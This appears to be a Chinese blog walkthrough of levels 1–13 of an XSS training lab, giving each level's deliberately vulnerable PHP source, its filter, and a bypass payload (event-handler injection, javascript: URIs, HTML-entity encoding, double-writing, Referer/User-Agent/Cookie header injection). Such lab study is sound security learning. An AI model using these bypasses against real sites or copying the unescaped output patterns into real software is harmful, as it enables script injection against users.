XSS闯关小游戏(level1~13)

已于 2023-02-06 00:00:47 修改
阅读量433 收藏 3
点赞数 1
分类专栏: XSS闯关小游戏靶场通关 文章标签: xss php web安全
于 2023-02-04 11:57:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43381463/article/details/128880359
版权

level1

  • 源代码

    <?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>

    通过源代码发现此关没有对输入的name值做任何过滤,直接echo出来

  • 寻找输入点和输出点

    image-20230203115953719

  • 构造payload

    <script>alert(1)</script>

    image-20230203120216007

level2

  • 源代码

    <?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
<center><img src=level2.png></center>
<?php

    此关使用了htmlspecialchars()函数---->把html标签转化为浏览器不能识别的字符,利用这个函数转化以后,html标签就可以在浏览器原样输出了。

  • 输入输出点

    image-20230203120955658

  • 构建payload

    1" οnclick="alert(1)

    image-20230203121107505

level3

  • 查看页面源代码

    <?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>

    可以发现在<H2><input>处都使用了htmlspecialchars()函数

  • 输入输出点

    image-20230203121508053

  • 构建payload

    1' οnclick='alert(1)

    image-20230203121558601

level4

  • 查看页面源代码

    <?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

    此关使用str_replace()对用户输入进行了过滤,将<>替换成空

  • 输入输出点

    image-20230203121636805

  • 构建payload

    1" οnclick="alert(1)

    image-20230203121921887

level5

  • 查看源代码

    <?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

    此关使用str_replace()对用户输入进行了过滤,将<script替换成<scr_ipton替换成o_n。并使用strtolower()对用户输入数据进行小写转义

  • 查看输入输出

    image-20230204095825614

  • 构造payload

    1"><iframe src=javascript:alert(1)>

    image-20230204101607693

level6

  • 查看源代码

    <?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

    此关过滤了<scriptonsrcdatahref字符

  • 查看输入输出

    image-20230204102023045

  • 构造payload

    1" Onclick="alert(1)

    image-20230204102917574

level7

  • 查看源代码

    <?php 
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

    此关过滤了<scriptonsrcdatahref字符,并且对用户输入进行小写转义

  • 查看输入输出

    image-20230204103203997

  • 构造payload

    1" oonnclick="alert(1)

    image-20230204103142629

level8

  • 查看源代码

    <?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
 echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>

    此关过滤了scriptonsrcdatahref"字符,对用户输入进行小写转义

  • 查看输入输出

    image-20230204104349905

  • 构造payload

    # 尝试将敏感字符转换为HTML实体字符
javascrip&#x74;:alert(1)

    image-20230204105619687

level9

  • 查看源代码

    <?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>

    此关对用户输入进行小写转义,过滤了scriptonsrcdatahref"字符

    strpos()函数是用来查找字符串首次出现的位置,返回类型为int,但是如是找不到该字符,返回布尔型的false值。

  • 查看输入输出

    image-20230204112242837

  • 构造payload

    javasc&#x72;ipt:alert(1)//http://

    image-20230204112154010

level10

  • 查看源代码

    <?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

    此关使用GET请求获取keyword的值,但无法使用keyword传值,尝试使用t_sort

    <>替换成空

  • 查看输入输出

    image-20230204113838265

  • 构造payload

    t_sort=1" type="text" onclick="alert(1)

    image-20230204113815367

level11

  • 查看源代码

    <?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

    根据源代码,此关只能使用HTTP_REFERER传值

  • 查看输入输出

    image-20230204114441280

  • 构造payload

    Referer:1" type="text" onclick="alert(1)

    image-20230204114542722

level12

  • 查看源代码

    <?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

    根据源代码,此关只能使用HTTP_USER_AGENT传值

  • 查看输入输出

    image-20230204115002808

  • 构造payload

    1" type="text" onclick="alert(1)

    image-20230204115049287

level13

  • 查看源代码

    <?php 
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

    根据源代码,此关只能使用COOKIE传值

  • 查看输入输出

    image-20230204115315586

  • 构造payload

    1" type="text" onclick="alert(1)

    image-20230204115358712

贫僧法号云空丶
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
level13:增量浏览器文字冒险
05-04
13级 Level 13是基于文本的增量科幻浏览器冒险,其中玩家必须在黑暗,腐朽的城市中生存,(重新)发现新旧技术,并重建已经崩溃的文明。 该游戏处于早期开发阶段。 您可以播放最新的(半)稳定版本。 13级是一个个人项目,但在此过程中已收到社区的一些修复。 如果您有兴趣贡献,请首先查看。 特征 生存与探索 基础建设和资源管理 随机生成的地图 物品,设备和环境危害 缓慢释放游戏新方面的技术 故事和RPG元素仍然缺少的主要功能。 玩家的进度目前也被限制在一定水平上-尚无法达到游戏的实际结局。 代码概述 该项目使用 , 和并根据实体系统框架构造为实体,组件和系统。 可播放版本位于gh-pages分支上,而master版本可能包含未经测试和不平衡的功能。 实体和组件 所有游戏数据都存储在附加到实体(例如玩家或扇区)的各种中。 实体只是组件的容器。 很好地概述了什么样的实体具有什么样的组件。 系
Xss游戏通关攻略带解释
sirius的博客
08-28 5446
Xss游戏通关攻略 实验环境:xss游戏源码+phpstudy 源码地址:https://files.cnblogs.com/files/Eleven-Liu/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 实验步骤:启动phpstudy,浏览器访问127.0.0.1/xss/后提示点击图片进入第一关。 第一关:输入的变量直接被输出,直接构造payload即可。 http://127.0.0.1/xss/level1.php?.
xss游戏
weixin_44110913的博客
03-01 698
<p></p><p>最近发现一个有趣的XSS关小游戏游戏的作者是先知社区的大佬@Mramydnei,喜欢XSS的大家可以一起来学习交流。</p> 现在我把自己在前面的十八关里面的关过程记录一下,大神绕行,我是菜鸟,大家可以一起学习,互相进步成长。 第一关,没有任何疑问,简单的不能再简单,没有任何过滤 输入点...
050 XSS关小游戏——xss challenge
鸡蛋炒鸡蛋
03-05 5667
文章目录一:下载与部署二:通关过程首页level-01level-02level-03level-04level-05level-06level-07level-08level-09 一:下载与部署 xss challenge是个有关反射型xss的测试通关挑战,一共有20关。 下载地址:xss challenge (访问密码:donMkh) 下载之后解压,把得到的文件夹放在phpstudy的www文件夹下即可   二:通关过程 这个是我自己的通关方法,不一定很准确 首页 level-01 点击
XSS-7注入靶场关(小游戏)——第七关
qq_39330735的博客
02-04 175
XSS-7注入靶场关(小游戏)——第七关,双写绕过
xss 利用总结
weixin_45427650的博客
02-29 857
参考https://www.cnblogs.com/bmjoker/p/9446472.html 过滤函数:htmlspecialchars() &:转换为&amp; ":转换为&quot; ':转换为成为 ’ <:转换为&lt; >:转换为&gt; 如果“<”被过滤 可以使用 payload : " onclick=alert(1)&g...
XSS-11注入靶场关(小游戏)——第十一关
qq_39330735的博客
02-04 454
XSS-11注入靶场关(小游戏)——第十一关通关详解,请求头referer注入
XSS-通关小游戏(1-20)
热门推荐
→_→
05-28 1万+
在玩游戏之前先简单的了解下,什么是XSS? 1.什么是xss XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 2.xss原理 (1).攻击者对某含有漏洞的服务器发起XSS攻击(注入JS代码) (2)诱使受害者打开受到攻击的服务器URL(邮件、留言等,此步骤可选项) (3)受害者在Web浏览
xss关小游戏.zip
02-25
这是一款利用xss漏洞关的小游戏,无需连接数据库,共20关,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS关1.md
08-10
一些关于xss的payload
xss源码小游戏.rar
07-09
xss代码小游戏,你值得拥有,简单粗暴,带你学会xss,非常适合初学者.
xss关挑战
11-09
这个是XSS关文件,解压后放在服务器的对应文件夹即可。 关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。
xss challenge 下载 xss 实践通关小游戏,以关的形式检验xss掌握程度。
04-27
xss challenge 下载 xss 实践通关小游戏,以关的形式检验xss掌握程度。
xss-labs小游戏
01-25
20关的xss游戏题,每一位xss大佬都做过哟,放在网站根目录即可纵享丝滑,快来尝试吧!
XSS游戏1-8关
最新发布
qq_61546067的博客
10-21 151
xss游戏,学习了解xss漏洞的绕过方式
【渗透测试】---xss-labs关【15-18关】
qq_43168364的博客
08-22 1568
第十五关 这一关使用了AngularJS框架,它可以通过<script>标签添加到HTML页面,它通过指令(其实就是新的属性)扩展了HTML。 服务器端代码解析 前端代码解析 ng-app 指令 ---- 初始化一个 AngularJS 应用程序。 ng-include 指令 ---- 用于包含外部的 HTML 文件。ng-include 属性的值可以是一个表达式,返回一个文件名。默认情况下,包含的文件需要包含在同一个域名下。(它的作用有点类似于PHP中的include函数) 这里可以让n
XSS关小游戏
weixin_42728957的博客
12-07 3465
最近在学习xss,找到了一个xss练习平台,在线地址:http://test.xss.tv/ 实验环境也可以本地搭建,不过需要php+mysql的环境: xss关小游戏:https://pan.baidu.com/s/1zS2GwTNbMBXEF2yNEBeLgA 密码:85g8 我这里使用本地搭建,方便分析代码,安装好的页面如下: level1 登录页面: 查看代码 <?php ini_set("display_errors", 0); $str = $_GET["name"]; ech
XSS-6注入靶场关(小游戏)——第六关
qq_39330735的博客
02-03 195
XSS注入靶场关-6第六关通关方法和过程详解
xss关小游戏~你的纵享丝滑
xinyue9966的博客
01-25 1961
xss-labs简言下载链接Level 1 基本命令Level 2 黑名单绕过Level 3 单引号绕过Level 4 双引号绕过Level 5 过滤鼠标事件Level 6 大小写绕过Level 7 双写绕过Level 8 编码绕过Level 9 检测httpLevel10 修改隐藏标签Level11 http头部注入Level12 User-Agent注入Level13 Cookie注入Level14 乌云漏洞Level15 Include文件包含Level16 %0a、%0d绕过Level17 on事件
[第二章 web进阶]xss关 1
04-10
XSS是指跨站脚本攻击。它是一种利用Web应用程序中的漏洞,向用户的浏览器中注入恶意代码的攻击方式。攻击者通过注入恶意代码,可以窃取用户的敏感信息,甚至控制用户的电脑。在Web应用程序中,应该采取安全措施,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值